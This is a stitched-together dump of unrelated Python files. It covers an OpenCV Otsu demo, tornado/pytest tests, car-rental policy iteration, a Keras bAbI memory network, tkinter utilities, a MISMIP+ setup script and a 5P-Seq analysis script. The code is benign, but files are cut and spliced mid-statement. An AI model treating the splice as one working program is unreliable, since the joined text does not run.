img_RGB = color_img[:, :, ::-1] ax = plt.subplot(2, 2, pos) plt.imshow(img_RGB) plt.title(title) plt.axis('off') def show_hist_with_matplotlib_gray(hist, title, pos, color, t=-1): """Shows the histogram using matplotlib capabilities""" ax = plt.subplot(2, 2, pos) # plt.title(title) plt.xlabel("bins") plt.ylabel("number of pixels") plt.xlim([0, 256]) plt.axvline(x=t, color='m', linestyle='--') plt.plot(hist, color=color) # Create the dimensions of the figure and set title and color: fig = plt.figure(figsize=(10, 10)) plt.suptitle("Otsu's binarization algorithm", fontsize=14, fontweight='bold') fig.patch.set_facecolor('silver') # Load the image and convert it to grayscale: image = cv2.imread('leaf.png') gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # Calculate histogram (only for visualization): hist = cv2.calcHist([gray_image], [0], None, [256], [0, 256]) # Threshold the image aplying Otsu's algorithm: ret1, th1 = cv2.threshold(gray_image, 0, 255, cv2.THRESH_TRUNC + cv2.THRESH_OTSU) # Plot all the images: show_img_with_matplotlib(image, "image", 1) show_img_with_matplotlib(cv2.cvtColor(gray_image, cv2.COLOR_GRAY2BGR), "gray img", 2) show_hist_with_matplotlib_gray(hist, "grayscale histogram", 3, 'm', ret1) show_img_with_matplotlib(cv2.cvtColor(th1, cv2.COLOR_GRAY2BGR), "Otsu's binarization", 4) # Show the Figure: plt.show() """Tests request handler object.""" import os import time import tempfile import pytest import tornado.web from tornado.httpclient import HTTPError import fixie.jsonutils as json from fixie.environ import ENV from fixie.request_handler import RequestHandler from fixie.tools import (fetch, verify_user_remote, verify_user_local, flock, next_jobid, detached_call, waitpid, register_job_alias, jobids_from_alias, jobids_with_name, default_path) try: from fixie_creds.cache import CACHE HAVE_CREDS = True except ImportError: HAVE_CREDS = False skipif_no_creds = pytest.mark.skipif(not HAVE_CREDS, reason="fixie-creds is not installed.") class NameObjectRequest(RequestHandler): schema = {'name': {'type': 'string'}} def post(self): name = self.request.arguments['name'] self.write({'nomen': 'My name is '+ name}) class MockVerifyRequest(RequestHandler): """Only will verify if user == token""" schema = {'user': {'type': 'string'}, 'token': {'type': 'string'}} def post(self): if self.request.arguments['user'] == self.request.arguments['token']: rtn = {'verified': True, 'message': '', 'status': True} else: rtn = {'verified': False, 'message': '', 'status': True} self.write(rtn) APP = tornado.web.Application([ (r"/", NameObjectRequest), (r"/verify", MockVerifyRequest), ]) @pytest.fixture def app(): return APP @pytest.mark.gen_test def test_fetch(http_client, base_url): body = {"name": "<NAME>"} response = yield fetch(base_url, body) assert response == {"nomen": 'My name is <NAME>'} @pytest.mark.gen_test def test_verify_user_remote_valid(http_client, base_url): valid, msg, status = verify_user_remote("me", "me", base_url) assert valid assert status @pytest.mark.gen_test def test_verify_user_remote_invalid(http_client, base_url): valid, msg, status = verify_user_remote("me", "you", base_url) assert not valid assert status @skipif_no_creds def test_verify_user_local(credsdir): # some set up user = 'grammaticus' email = '<EMAIL>' assert not CACHE.user_exists(user) token, flag = CACHE.register(user, email) # test valid valid, message, status = verify_user_local(user, token) assert valid assert status # test invalid valid, message, status = verify_user_local(user, '101010') assert not valid assert status def test_flock(): fname = 'flock-test' lock = fname + '.lock' if os.path.exists(fname): os.remove(fname) if os.path.exists(lock): os.remove(lock) with flock(fname, timeout=10.0) as fd: # basic checks assert fd != 0 assert os.path.exists(lock) # check that the lock is actually working with flock(fname, timeout=0.01, sleepfor=0.001, raise_errors=False) as fe: assert fe == 0 assert os.path.exists(lock) assert not os.path.exists(lock) def test_next_jobid(jobfile): assert 0 == next_jobid() assert 1 == next_jobid() assert 2 == next_jobid() with open(jobfile) as f: n = f.read() n = int(n.strip()) assert 3 == n def test_job_aliases(jobaliases): register_job_alias(1, 'me', name='some-sim', project='myproj') register_job_alias(42, 'me', name='some-sim', project='myproj') jids = jobids_from_alias('me', name='some-sim', project='myproj') assert jids == {1, 42} jids = jobids_from_alias('me', name='bad', project='nope') assert jids == set() # test from name register_job_alias(43, 'you', name='some-sim', project='other') jids = jobids_with_name('some-sim') assert jids == {1, 42, 43} jids = jobids_with_name('bad-name') assert jids == set() def test_detached_call(): with ENV.swap(FIXIE_DETACHED_CALL='test'), tempfile.NamedTemporaryFile('w+t') as f: child_pid = detached_call(['env'], stdout=f) status = waitpid(child_pid, timeout=10.0) f.seek(0) s = f.read() assert status assert os.getpid() != child_pid assert 'FIXIE_DETACHED_CALL=test' in s @pytest.mark.parametrize('path, name, project, jobid, exp', [ ('x', '', '', -1, '/x'), ('/y', '', '', -1, '/y'), ('x/y', '', '', -1, '/x/y'), ('/x/y/z', '', '', -1, '/x/y/z'), ('', 'sim', '', -1, '/sim.h5'), ('', 'sim', 'proj', -1, '/proj/sim.h5'), ('', '', 'proj', 42, '/proj/42.h5'), ]) def test_default_path(path, name, project, jobid, exp): obs = default_path(path, name=name, project=project, jobid=jobid) assert exp == obs # MIT License # Copyright (c) 2020 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import numpy as np import matplotlib import matplotlib.pyplot as plt import seaborn as sns import math ACTIONS = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5] CAR_RENTAL_COST = 10 CAR_MOVE_COST = 2 MAX_CARS = 20 MAX_MOVE = 5 REQUEST_1_LAMBDA = 3 DROPOFF_1_LAMBDA = 3 REQUEST_2_LAMBDA = 4 DROPOFF_B_LAMBDA = 2 DISCOUNT = 0.9 class CarRental: def __init__(self): self.reset() return def step(self, state, action): """ Run one timestep of the environment's dynamics. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (Tuple[Tuple[int, int], float]): The new state of the system, and its correspondent reward """ morning_n1 = int(state[0] - action) morning_n2 = int(state[1] + action) new_state = (morning_n1, morning_n2) reward = self.get_reward(new_state) return new_state, reward def reset(self): """ Resets the state of the environment and returns an initial observation. """ self._poisson_prob = {} self.state_values = np.zeros((MAX_CARS + 1, MAX_CARS + 1)) self.policy = np.zeros((MAX_CARS + 1, MAX_CARS + 1), np.int32) self._probs_1, self._rewards_1 = self.precompute_model( REQUEST_1_LAMBDA, DROPOFF_1_LAMBDA) self._probs_2, self._rewards_2 = self.precompute_model( REQUEST_2_LAMBDA, DROPOFF_B_LAMBDA) return def render(self): """ Plots the current value table and the current policy """ # plot value table fig, ax = plt.subplots(1, 2, figsize=(15, 5)) sns.heatmap(self.state_values, cmap="gray", ax=ax[0]) ax[0].set_ylim(0, MAX_CARS) ax[0].set_title("Value table V_π") # plot policy cmaplist = [plt.cm.RdBu(i) for i in range(plt.cm.RdBu.N)] dRbBu = matplotlib.colors.LinearSegmentedColormap.from_list( 'dRdBu', cmaplist, plt.cm.RdBu.N) sns.heatmap(self.policy, vmin=-5, vmax=5, cmap=dRbBu, ax=ax[1], cbar_kws={"ticks": ACTIONS, "boundaries": ACTIONS}) ax[1].set_ylim(0, MAX_CARS) ax[1].set_title("Policy π") plt.show() return fig, ax def get_transition_probability(self, state, new_state): """ Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B new_state (Tuple[int, int]): A possible future state of the environment Returns: (float): The probability that the system transitions from a state `s` to a state `s'`. """ return self._probs_1[(state[0], new_state[0])] * self._probs_2[(state[1], new_state[1])] def get_reward(self, state): """ Computes the reward for the given state. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B Returns: (float): The expected reward for the given state """ return self._rewards_1[state[0]] + self._rewards_2[state[1]] def get_valid_action(self, state, action): """ Return an action that is compatible with the current state of the system. For example, if there are 2 cars available at location 1, and the action is to move 3 cars from location 1, the function will clip the value at 2. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (int): a feasible number of cars to be moved """ cars_at_1, cars_at_2 = state # Jack can't move more cars than he has available action = max(-cars_at_2, min(action, cars_at_1)) # Jack can move at most 5 cars action = max(-MAX_MOVE, min(MAX_MOVE, action)) return action def get_available_actions(self, state): """ Return the list of actions compatible with the current state of the system. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B Returns: (List[int]): The list of actions compatible with the current state of the system. """ return list(range(max(-MAX_CARS, - state[1]), min(MAX_CARS, state[0]) + 1)) def poisson_probability(self, n, lam): """ Computes the probability that the number drawn from a poisson distribution is `n`, given a lamdda of `lam`. `$p = e^(-λ) * (λ^n / n!)$ Args: n (int): the number expected to be drawn from the distribution lam (int): the λ parameter of the poisson distribution Returns: (float): the probability that the number is `n` """ key = (n, lam) if key not in self._poisson_prob: self._poisson_prob[key] = math.exp(-lam) * \ (math.pow(lam, n) / math.factorial(n)) return self._poisson_prob[key] def precompute_model(self, lambda_requests, lambda_dropoffs): """ Precomputes the model dynamics for efficiency: the reward and the transition probabilities. Calculates the expected rewards for a range of requests from 0 to MAX_CARS + max(ACTIONS) + 1, and stores them into a privare array. Calculates the probability that the system transitions from a state `s` to a state `s'`. Args: lambda_requests (int): the λ parameter of the poisson distribution that describes the requests lambda_dropoffs (int): the λ parameter of the poisson distribution that describes the dropoffs Returns: (Tuple[numpy.ndarray, numpy.ndarray]): The array of system transitions probabilities and the array of expected rewards """ P, R = {}, {} requests = 0 for requests in range(MAX_CARS + max(ACTIONS) + 1): request_prob = self.poisson_probability(requests, lambda_requests) for n in range(MAX_CARS + max(ACTIONS) + 1): if n not in R: R[n] = 0. R[n] += CAR_RENTAL_COST * request_prob * min(requests, n) dropoffs = 0 for dropoffs in range(MAX_CARS + max(ACTIONS) + 1): dropoffs_prob = self.poisson_probability( dropoffs, lambda_dropoffs) for n in range(MAX_CARS + max(ACTIONS) + 1): satisfied_requests = min(requests, n) new_n = max( 0, min(MAX_CARS, n + dropoffs - satisfied_requests)) if (n, new_n) not in P: P[(n, new_n)] = 0. P[(n, new_n)] += request_prob * dropoffs_prob return P, R def bellman_expectation(self, state, action): """ Solves the bellman expectation equation for given state V(s) = p(s, r | s' π(s)) * (R(s) + γ * V(s')) Args: state (Tuple[int, int]): a tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (float): the value V(s) of the current state pair """ action = self.get_valid_action(state, action) (morning_n1, morning_n2), r = self.step(state, action) state_value = -CAR_MOVE_COST * abs(action) for new_n1 in range(MAX_CARS + 1): for new_n2 in range(MAX_CARS + 1): p = self.get_transition_probability( (morning_n1, morning_n2), (new_n1, new_n2)) state_value += p * \ (r + DISCOUNT * self.state_values[new_n1, new_n2]) return state_value def policy_evaluation(self, theta=1e-3): """ Computes the true value table for the current policy using iterative policy evaluation. At the end of the process it updates the state-value table with the newly computed value function. Returns: (numpy.ndarray): The value function of the current policy stored as a 2D array """ new_values = np.empty_like(self.state_values) while True: # for each state s ∈ S for available_A in range(MAX_CARS + 1): for available_B in range(MAX_CARS + 1): state = (available_A, available_B) # a = π(s) action = self.policy[available_A, available_B] # V(s) = p(s, r | s' π(s)) * (R(s) + γ * V(s')) new_state_value = self.bellman_expectation(state, action) # according the the original lisp code, the evaluation is performed asynchronously: # http://incompleteideas.net/book/code/jacks.lisp new_values[state] = new_state_value delta = np.max(np.abs(self.state_values - new_values)) print("\t\tValue delta {:.5f}\t\t ".format(delta), end="\r") self.state_values = new_values.copy() new_values = np.empty_like(self.state_values) if delta < theta: print() return raise ValueError( "The value table did not converge. Check your inputs or look for bugs.") def policy_improvement(self): """ Makes one step of policy improvement following a greedy policy. For each state of the model, it iterates through all the feasible actions and finds the greediest one. The current policy is updated synchronously for each state, i.e. only after all the states have been visited. Returns: (bool): True if the policy has not improved """ new_policy = np.empty_like(self.policy) # for each state s ∈ S for available_A in range(MAX_CARS + 1): for available_B in range(MAX_CARS + 1): state = (available_A, available_B) best_action = self.policy[state] best_value = -float("inf") for action in self.get_available_actions(state): value = self.bellman_expectation(state, action) # print(state, action, value) if value > best_value: best_value = value best_action = action new_policy[available_A, available_B] = best_action converged = (new_policy == self.policy).all() self.policy = new_policy.copy() return converged def policy_iteration(self, plot=False): """ Computes the optimal policy π* using policy iteration. Convergence is guaranteed since the MDP has only a finite number of policies. Note that the optimal policy might not be unique. Args: plot (bool): If true, self.render() will be called at each evaluation/iteration step Returns: (numpy.ndarray): The optimal policy """ iteration = 1 if plot: self.render() while True: # log print("Iterating through policy {}".format(iteration)) # policy evaluation to update the value table print("\tEvaluating policy {}".format(iteration)) self.policy_evaluation() # policy improvement to update the current policy, based on the new value table print("\tImproving policy {}".format(iteration)) converged = self.policy_improvement() # has π converged to π*? I.e. is the current policy stable? if converged: print("Policy is stable. π converged to π*") return # plot if plot: self.render() iteration += 1 raise ValueError( "The policy did not converge. Check your inputs or look for bugs.") if __name__ == "__main__": env = CarRental() env.policy_iteration(True) # coding: utf-8 import os import nbimporter from keras.models import Sequential, Model from keras.layers.embeddings import Embedding from keras.preprocessing.sequence import pad_sequences from keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate from keras.layers import LSTM from keras.utils.data_utils import get_file from functools import reduce from nltk.tokenize import word_tokenize import tarfile from text_processing import * import numpy as np import pickle import keras import re import random def parse_text(lines, only_supporting=False): # Make two new Lists/Arrays to store data and text data = [] text = [] # Read the text from bAbI Dataset for line in lines: # Lines input from Text # Format: ID Line line = line.decode('utf-8').strip() # Separate ID and Text from Input Lines # Lines contain both Text as well as Question Answers id, line = line.split(' ', 1) # Convert ID to int type id = int(id) # If ID = 1, it is the text/story if id == 1: text = [] # If there is a tab space in the input lines, it contains Question, Answer, Supporting Text ID # and the Supporting Line Number in the Text # Format: Question? Answer Line_Number if '\t' in line: ques, ans, supporting = line.split('\t') # Take in the Question and Tokenize it into words ques = tokenize(ques) subtext = None # Keep only the supporting text from Question; only_supporting = True if only_supporting: # Map the Supporting Text ID as int supporting = list(map(int, supporting.split())) # subtext: List of the sentences supporting the Questions subtext = [text[i - 1] for i in supporting] else: # Contains all the related Text Lines in the file # Relation using Supporting ID subtext = [x for x in text if x] # Data containes tokenized first two sentences, then the answers. # All tokenized words in form of arrays # Tokenized text in form of array of array # All this in a List # data: array of all such Lists # Format: [([[First sentence Tokeinized],[Second Sentence Tokenized]],[Question with Answer Tokenized]), ....] data.append((subtext, ques, ans)) text.append('') else: sent = tokenize(line) text.append(sent) return data # Read the file, retrieve the stories and convert sentences into a single story def get_stories(file, only_supporting=False, max_length=None): # Data containes tokenized first two sentences, then the answers. # All tokenized words in form of arrays # Tokenized text in form of array of array # All this in a List # data: array of all such Lists # Format: [([[First sentence Tokeinized],[Second Sentence Tokenized]],[Question with Answer Tokenized]), ....] data = parse_text(file.readlines(), only_supporting=only_supporting) flatten = lambda data: reduce(lambda x, y: x + y, data) # flatten: Takes two sentences and makes one array, 2nd array of Question answer in a list # Format: [([First sentence Tokeinized, Second Sentence Tokenized],[Question with Answer Tokenized]), ....] data = [(flatten(text), question, answer) for text, question, answer in data if not max_length or len(flatten(text)) < max_length] return data class memoryNetwork(object): FILE_NAME = 'model' VOCAB_FILE_NAME = 'model_vocab' def __init__(self): if (os.path.exists(memoryNetwork.FILE_NAME) and os.path.exists(memoryNetwork.VOCAB_FILE_NAME)): self.load() # else: self.train() self.store() def load(self): self.model = keras.models.load_model(memoryNetwork.FILE_NAME) with open(memoryNetwork.VOCAB_FILE_NAME, 'rb') as file: self.word_id = pickle.load(file) def store(self): self.model.save(memoryNetwork.FILE_NAME) with open(memoryNetwork.VOCAB_FILE_NAME, 'wb') as file: pickle.dump(self.word_id, file) def train(self): # Load the bAbI Dataset try: dataPath = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz') except: print('Error downloading dataset, please download it manually:\n' '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\n' '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz') raise tar = tarfile.open(dataPath) # Load the Single Supporting Fact and Two Supporting Fact files challenges = { # QA1 with 10,000 samples 'single_supporting_fact_10k': 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt', # QA2 with 10,000 samples 'two_supporting_facts_10k': 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt', } challenge_type = 'single_supporting_fact_10k' challenge = challenges[challenge_type] # Extract the Text from single_supporting_fact_10k file print('Extracting stories for the challenge:', challenge_type) # Load the Testing and Training Text Data train_stories = get_stories(tar.extractfile(challenge.format('train'))) test_stories = get_stories(tar.extractfile(challenge.format('test'))) # Initialize vocabulary as as Set # Create a Vocabulary list with all words occuring only once vocab = set() for text, ques, answer in train_stories + test_stories: vocab |= set(text + ques + [answer]) # Sort the words in Vocabulary List vocab = sorted(vocab) # Get the max length of the Vocabulary, text and Questions vocab_size = len(vocab) + 1 # text_max_length: length of th subtext; no. of subtexts text_max_length = max(list(map(len, (x for x, _, _ in train_stories + test_stories)))) # ques_max_length: length of questions in input. ques_max_length = max(list(map(len, (x for _, x, _ in train_stories + test_stories)))) # Vectorize the Training and Testing Data self.word_id = dict((c, i + 1) for i, c in enumerate(vocab)) # inputs_train: Matrix of Arrays; Arrays containing vectorized sentences # ques_train: Matrix of Arrays; Each array has 4 values; Each value corresponds to a character. # answers_train: Matrix of Arrays; Each array contains a single "1", index corresponding to answer inputs_train, ques_train, answers_train = vectorize_text(train_stories, self.word_id, text_max_length, ques_max_length) inputs_test, ques_test, answers_test = vectorize_text(test_stories, self.word_id, text_max_length, ques_max_length) # Define Placeholders input_sequence = Input((text_max_length,)) question = Input((ques_max_length,)) # ---------------------------------- Encode the Data ---------------------------------------- # Embed the input sequence into a sequence of vectors input_encoder_m = Sequential() input_encoder_m.add(Embedding(input_dim=vocab_size, output_dim=64)) input_encoder_m.add(Dropout(0.3)) # Output: (samples, text_maxlen, embedding_dim) # Embed the input into a sequence of vectors of size ques_max_length input_encoder_c = Sequential() input_encoder_c.add(Embedding(input_dim=vocab_size, output_dim=ques_max_length)) input_encoder_c.add(Dropout(0.3)) # output: (samples, story_maxlen, query_maxlen) # Embed the question into a sequence of vectors question_encoder = Sequential() question_encoder.add(Embedding(input_dim=vocab_size, output_dim=64, input_length=ques_max_length)) question_encoder.add(Dropout(0.3)) # output: (samples, query_maxlen, embedding_dim) # Encode input sequence and questions (which are indices) # to sequences of dense vectors input_encoded_m = input_encoder_m(input_sequence) input_encoded_c = input_encoder_c(input_sequence) question_encoded = question_encoder(question) # compute a 'match' between the first input vector sequence # and the question vector sequence # shape: `(samples, story_maxlen, query_maxlen)` match = dot([input_encoded_m, question_encoded], axes=(2, 2)) match = Activation('softmax')(match) # add the match matrix with the second input vector sequence response = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen) response = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen) # concatenate the match matrix with the question vector sequence answer = concatenate([response, question_encoded]) # the original paper uses a matrix multiplication for this reduction step. # we choose to use a RNN instead. answer = LSTM(32)(answer) # (samples, 32) # one regularization layer -- more would probably be needed. answer = Dropout(0.3)(answer) answer = Dense(vocab_size)(answer) # (samples, vocab_size) # we output a probability distribution over the vocabulary answer = Activation('softmax')(answer) # build the final model self.model = Model([input_sequence, question], answer) self.model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) # Train the Model self.model.fit([inputs_train, ques_train], answers_train, batch_size=32, epochs=120, validation_data=([inputs_test, ques_test], answers_test)from PIL import Image import tkinter as tk from tkinter import filedialog from tkinter import messagebox from os import listdir from os.path import isfile, join images_opened = [] root= tk.Tk() canvas1 = tk.Canvas(root, width = 300, height = 300, bg = 'white', relief = 'raised') canvas1.pack() label1 = tk.Label(root, text='PNGs to PDF', bg = 'white') label1.config(font=('helvetica', 20)) canvas1.create_window(150, 60, window=label1) def getFile (): global images_opened images_opened = [] import_file_path = filedialog.askopenfilename() slice_index = [pos for pos, char in enumerate(import_file_path) if char == '/'] dir_path = import_file_path[:slice_index[-1]] imgs = [f for f in listdir(dir_path) if f.endswith('.png')] def getOrder(img): order = img[-6:-4] if img[-6:-4].isdigit() else img[-5] return int(order) imgs_tuple = [ (img,getOrder(img)) for img in imgs] imgs_tuple_SR = sorted(imgs_tuple, key=lambda t: t[1]) imgs_path = [join(dir_path,file) for file, i in imgs_tuple_SR] for i in imgs_path: im_t = Image.open(i) images_opened.append(im_t.convert('RGB')) print(str(len(images_opened)) + " images were saved \nClick Convert to PDF button") browseButton = tk.Button(text="Select First File", command=getFile, bg='green', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 130, window=browseButton) def convertToPdf (): global images_opened export_file_path = filedialog.asksaveasfilename(defaultextension='.pdf') images_opened[0].save(export_file_path,save_all=True, append_images=images_opened[1:]) print("Saved pdf file completely ") saveAsButton = tk.Button(text='Convert to PDF', command=convertToPdf, bg='green', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 180, window=saveAsButton) def exitApplication(): MsgBox = tk.messagebox.askquestion ('Exit Application','Are you sure you want to exit the application',icon = 'warning') if MsgBox == 'yes': root.destroy() exitButton = tk.Button (root, text='Exit Application',command=exitApplication, bg='brown', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 230, window=exitButton) root.mainloop() <filename>_todo/programme/listebar.py # -*- coding: utf-8 -*- import tkinter import tkinter.scrolledtext root = tkinter.Tk () o = tkinter.scrolledtext.ScrolledText (root) for k in range (0,100) : o.insert (tkinter.END, "ligne " + str (k)) o.pack () def print_file () : # voir chapitre sur les événements print (o.selection_get ()) # idem b = tkinter.Button (root, text = "print") b.config (command = print_file) # idem b.pack () root.mainloop () # idem <gh_stars>0 #!/usr/bin/env python # Set up subdirectories for the various MISMIP+ experiments: # Ice0, Ice1r, Ice1ra, Ice1rr, Ice1rax, Ice1rrx, Ice2r, Ice2ra, Ice2r, Ice2rax, Ice2rrx # Note: Ice1rax is the optional extension of Ice1ra from year 200 to 1000, # and similarly for the other Ice*x experiments. # The namelist and streams files for each experiment should already # have been created in the directory from which this script is launched; # the script simply moves them to the subdirectories. import sys, os import shutil # Parse options from optparse import OptionParser parser = OptionParser() parser.add_option("-x", "--expt", dest="experiment", type='string', help="MISMIP+ experiment(s) to set up", metavar="EXPT") options, args = parser.parse_args() if options.experiment: if options.experiment == 'all': # Set up subdirectories for all experiments experiments = ['Spinup', 'Ice0', 'Ice1r', 'Ice1ra', 'Ice1rr', 'Ice1rax', 'Ice1rrx', 'Ice2r', 'Ice2ra', 'Ice2rr', 'Ice2rax', 'Ice2rrx'] else: experiments = [options.experiment] else: sys.exit('Error: No experiment specified. Please specify experiment(s) with the -x option') print 'Experiments:', experiments # Loop through experiments for expt in experiments: print 'Setting up directory for experiment', expt # Make the subdirectory if it does not exist already try: os.mkdir(expt) except: pass # Go to the subdirectory try: os.chdir(expt) except: sys.exit('Error, could not change to subdirectory') # Move the appropriate namelist and stream files from the parent directory. # Note: In the subdirectory, the expt prefix (e.g., 'Ice0') is not included. # So there is no need for the -n and -s specifiers when launching a run. namelistFile = '../namelist.landice.' + expt shutil.move(namelistFile, './namelist.landice') streamsFile = '../streams.landice.' + expt shutil.move(streamsFile, './streams.landice') # Link to the executable in the parent directory executableName = 'landice_model' os.symlink('../landice_model', 'landice_model') # Link to any and all graph partition files in the parent directory # Note: If a new file is needed, it can be created using metis. # For example to run on 128 cores on LANL IC: # > module load metis # > gpmetis graph.info 128 # This creates a file called graph.info.part.128 for file in os.listdir('..'): if file.startswith('graph.info.part'): os.symlink('../' + file, file) # Link to the albany input file in the parent directory os.symlink('../' + 'albany_input.xml', 'albany_input.xml') # Link to the appropriate restart file and timestamp # No restart file needed for the Spinup experiment # Note: The symlinks will initially be empty (except for landice_grid.nc). # Ice0, Ice1r and Ice2r must follow the Spinup. # Ice1ra and Ice1rr must follow Ice1r; Ice2ra and Ice2rr must follow Ice2r. # Ice1rax must follow Ice1ra, and similiary for the other Ice*x. if expt == 'Spinup': # Start from landice_grid.nc gridfile = 'landice_grid.nc' griddir = '../' os.symlink(griddir + gridfile, gridfile) elif expt =='Ice0' or expt=='Ice1r' or expt=='Ice2r': # Start from restart file at the end of Spinup, but call it landice_grid.nc, # so the run is treated as a cold start # Note: This requires a one-line NCO command to rename the Spinup restart file # while removing the xtime variable gridfile = 'landice_grid.nc' griddir = '../Spinup/' os.symlink(griddir + gridfile, gridfile) else: # Start from the appropriate restart file if expt=='Ice1ra' or expt=='Ice1rr': restartYear = 100 restartdir = '../Ice1r/' elif expt=='Ice1rax': restartYear = 200 restartdir = '../Ice1ra/' elif expt=='Ice1rrx': restartYear = 200 restartdir = '../Ice1rr/' elif expt=='Ice2ra' or expt=='Ice2rr': restartYear = 100 restartdir = '../Ice2r/' elif expt=='Ice2rax': restartYear = 200 restartdir = '../Ice2ra/' elif expt=='Ice2rrx': restartYear = 200 restartdir = '../Ice2rr/' # Link to the restart file restartfile = 'restart_00' + str(restartYear) + '.nc' os.symlink(restartdir + restartfile, restartfile) # Create the restart_timestamp file # Not using symbolic links because these allow files to be rewritten # from other directories timestampFile = open('restart_timestamp', 'w') restartTimestamp = ' ' + str(restartYear) + '-01-01_00:00:00' timestampFile.write(restartTimestamp + '\n') timestampFile.close() # Go back to the main directory and continue os.chdir('..') <reponame>ryansingman/todo-sql from .parser import parse_command<reponame>BroganD1993/MoodleFUSE<filename>moodlefuse/filesystem/path_parser.py #!/usr/bin/env python # encoding: utf-8 """Class to parse a filesystem path """ from moodlefuse.core import config class PathParser(object): @staticmethod def is_in_root(location): return len(location) is 0 @staticmethod def is_in_course(location): return len(location) is 1 @staticmethod def is_in_course_categorie(location): return len(location) is 2 @staticmethod def is_file(location): return len(location) is 3 @staticmethod def is_assignment(location): return len(location) is 4 @staticmethod def is_assignment_submission(location): return len(location) is 5 @staticmethod def get_position_in_filesystem_as_array(path): path = path.replace(config['LOCAL_MOODLE_FOLDER'] + '/', '') if len(path) is 0: return [] path_sections = path.split("/") return path_sections <gh_stars>0 #!/usr/bin/env python # # works fine # Features to add: # a) split by stop codon and # # Computing Queing score is changed. # assumes 5P-Seq uncorrected 5' positions what is mapped to A-Site with offset 17 # Peaks positions 1 -18:-16 *1 (mono-somes STOP codon) # 2 -48:-46 *2 (di-somes) # 3 -78:-76 *3 (tri-somes) # 4 -108:-106 *4 (tetra-somes) . # ver. 0.1.6 # divide with avarage codon coverage and sum() = QS # # bkg region can be selected between peaks (-bkg 2) or before tetrasome peak area (-bkg 1 (default) ) # ver. 0.1.7 # # -w weigthing tetra-,tri-, and disomes YES/NO default NO # ver. 0.1.8 __author__ = "<NAME>" __copyright__ = "Copyright 2020" __version__ = "0.1.8" __email__ = "<EMAIL>" __status__ = "beta" import sys import argparse import pandas as pd import pysam parser = argparse.ArgumentParser(description='Computes ribosomes queing score at stop') parser.add_argument('-i', type=str, help='input table of gene coverage in *.hd5 format') parser.add_argument('-o', type=str, help='output file name *.csv') parser.add_argument('-annot', type=str, help='GTF annotation file', default='0-References/genome.gtf.gz') parser.add_argument('-th1', type=float, help='Summary gene coverage 150 nt before stop - 10(rpm) default', default=15) parser.add_argument('-th2', type=float, help='Background coverage - codon mean from -115 up to Span', default=0.15) parser.add_argument('-span', type=int, help='Positions before - stop recommended 150 or bigger', default=150) parser.add_argument('-bkg', type=int, help='region for bakground con be 1 or 2: 1 - before and 2 - between peaks', default=2) parser.add_argument('-col', type=str, help='column for values: "sum"; "rpm"; "counts"', default='rpm') parser.add_argument('-w', type=str, help='Weigthing tetra-,tri-, and di-somes: YES/NO/BOTH', default="NO") args = parser.parse_args() message = "between peaks" if args.bkg==2 else "{} to {}".format(-args.span, -115) print("\n\ -i input *.h5: {}\n\ -o output *.csv: {}\n\ -annot annotation GTF: {}\n\ -col column: {}\n\ -th1 region threshold: {}\n\ -th2 bkg threshold: {}\n\ -bkg bkg region is: {}\n\ -w weigthing peaks: {}\n\ -span nt before stop: {}\n".format(args.i, args.o, args.annot, args.col, args.th1, args.th2, message, args.w, args.span)) usage = "./compute_queuing_5PSeq.py -i *.hdf -o *.csv" if (args.i==None)|(args.o==None): sys.exit("\n usage:\n\t{}\n".format(usage)) infile_h5 = args.i outfile = args.o thres_cover= args.th1 thres_bkg = args.th2 Span = args.span annotation = args.annot col = args.col bkg_region = args.bkg weighted = str.upper(args.w) ## check is there enough space for background if (Span<109) & (bkg_region==2): report = "Increase -ppan at least up to 108. Current value is {} ".format(Span) sys.exit("\n {} \n".format(report)) # Span - 115 must be bigger than 9 nt if ((Span-115)<9) & (bkg_region==1): report = "{}nt is too little for backgrouns. Increase Span at least up to 124".format(Span-115) sys.exit("\n {} \n".format(report)) replacestr = "_th{}-{}_v4.csv".format(thres_cover, thres_bkg) outfile = outfile.replace('.csv', replacestr) ############################ def df_framing(df1, index, columns, strand="+"): # create df2 df2 = pd.DataFrame(0, index=index, columns=columns) df1 = df1.add(df2, fill_value=0, axis=1) if strand == "+": df1.reset_index(inplace=True) # reset index return df1[columns] elif strand == "-": df1 = 